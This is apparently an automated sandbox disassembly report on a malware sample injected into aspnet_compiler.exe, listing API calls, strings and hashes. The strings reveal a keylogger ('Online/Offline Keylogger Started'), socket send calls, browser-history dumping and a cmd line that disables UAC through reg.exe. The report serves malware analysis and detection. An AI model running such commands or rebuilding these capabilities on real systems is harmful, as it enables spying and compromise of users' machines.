                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                          • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                          • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                          • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                          • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                          • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                          • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                          • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                          • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                          • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                          Strings
                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                          • API String ID: 3024135584-2418719853
                                                          • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                          • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                          • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                          • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetCursorInfo$User32.dll$`#v
                                                          • API String ID: 1646373207-1032071883
                                                          • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                          • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                          • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                          • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                          • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                          • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                          • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                          APIs
                                                            • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                          • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                          • String ID:
                                                          • API String ID: 3525466593-0
                                                          • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                          • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                          • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                          • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                          APIs
                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                            • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 4269425633-0
                                                          • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                          • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                          • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                          • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                          • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                          • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                          • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                          • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                          • __freea.LIBCMT ref: 0044FFC4
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                          • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                          • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                          • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                          • _free.LIBCMT ref: 0044E1A0
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                          • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                          • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                          • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                          • _free.LIBCMT ref: 00446F7D
                                                          • _free.LIBCMT ref: 00446FA4
                                                          • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                          • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                          • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                          • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                          • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                          APIs
                                                          • _free.LIBCMT ref: 0044F7B5
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 0044F7C7
                                                          • _free.LIBCMT ref: 0044F7D9
                                                          • _free.LIBCMT ref: 0044F7EB
                                                          • _free.LIBCMT ref: 0044F7FD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                          • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                          • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                          • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                          APIs
                                                          • _free.LIBCMT ref: 00443305
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 00443317
                                                          • _free.LIBCMT ref: 0044332A
                                                          • _free.LIBCMT ref: 0044333B
                                                          • _free.LIBCMT ref: 0044334C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                          • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                          • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                          • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                          APIs
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                          • IsWindowVisible.USER32(?), ref: 004167A1
                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                                          • String ID: (FG
                                                          • API String ID: 3142014140-2273637114
                                                          • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                          • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                          • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                          • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 0044D4A8
                                                          • _free.LIBCMT ref: 0044D5C5
                                                            • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                            • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                            • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                          • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                          • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                          • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                          APIs
                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                            • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                          • String ID: XCG$`AG$>G
                                                          • API String ID: 2334542088-2372832151
                                                          • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                          • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                          • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                          • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 00442714
                                                          • _free.LIBCMT ref: 004427DF
                                                          • _free.LIBCMT ref: 004427E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                          • API String ID: 2506810119-572611079
                                                          • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                          • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                          • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                          • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "$8>G
                                                          • API String ID: 368326130-2663660666
                                                          • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                          • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                          • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                          • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                          • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                          • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                          • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                          • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                          • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                          APIs
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                          • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                          • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                          • String ID: Online Keylogger Started
                                                          • API String ID: 112202259-1258561607
                                                          • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                          • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
